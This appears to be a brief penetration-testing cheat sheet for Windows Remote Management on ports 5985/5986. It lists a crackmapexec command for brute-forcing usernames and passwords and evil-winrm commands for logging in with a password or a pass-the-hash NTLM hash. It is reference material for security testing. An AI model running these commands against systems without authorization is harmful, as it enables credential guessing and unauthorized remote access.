Skip to content

5985,5986 - Pentesting winrm

windows

WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.

crackmapexec

bruteforce user / password 

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success

evil-winrm

evil-winrm - with password 

evil-winrm -u $USER -p $PASS -i $IP
evil-winrm - with hash 
evil-winrm -u <username> -H <Hash> -i <IP>

  • https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm